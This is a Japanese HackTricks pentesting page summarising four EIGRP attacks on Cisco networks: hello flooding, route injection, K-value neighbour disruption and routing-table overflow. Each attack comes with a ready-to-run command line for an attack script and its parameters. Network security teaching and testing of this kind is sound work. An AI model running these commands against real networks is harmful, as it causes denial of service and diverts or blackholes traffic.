EIGRP Attacks
Last updated
Last updated
AWSハッキングの学習と練習:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングの学習と練習:HackTricks Training GCP Red Team Expert (GRTE)
これは https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 で公開された攻撃の要約です。詳細についてはそちらをご覧ください。
目的: EIGRPハローパケットをフラッディングしてルーターのCPUを過負荷にし、サービス拒否(DoS)攻撃を引き起こす可能性がある。
ツール: helloflooding.pyスクリプト。
実行: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
パラメータ:
--interface
: ネットワークインターフェースを指定、例: eth0
。
--as
: EIGRP自律システム番号を定義、例: 1
。
--subnet
: サブネットの場所を設定、例: 10.10.100.0/24
。
目的: 偽のルートを注入してネットワークトラフィックの流れを妨害し、トラフィックが存在しない宛先に向けられるブラックホールを作成する。
ツール: routeinject.pyスクリプト。
実行: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
パラメータ:
--interface
: 攻撃者のシステムインターフェースを指定。
--as
: EIGRP AS番号を定義。
--src
: 攻撃者のIPアドレスを設定。
--dst
: ターゲットサブネットIPを設定。
--prefix
: ターゲットサブネットIPのマスクを定義。
目的: 変更されたK-Valuesを注入することでEIGRPドメイン内で連続的な障害と再接続を作成し、実質的にDoS攻撃を引き起こす。
ツール: relationshipnightmare.pyスクリプト。
実行: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
パラメータ:
--interface
: ネットワークインターフェースを指定。
--as
: EIGRP AS番号を定義。
--src
: 正規のルーターのIPアドレスを設定。
目的: 偽のルートを大量にルーティングテーブルにフラッディングしてルーターのCPUとRAMを過負荷にする。
ツール: routingtableoverflow.pyスクリプト。
実行: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
パラメータ:
--interface
: ネットワークインターフェースを指定。
--as
: EIGRP AS番号を定義。
--src
: 攻撃者のIPアドレスを設定。
AWSハッキングの学習と練習:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングの学習と練習:HackTricks Training GCP Red Team Expert (GRTE)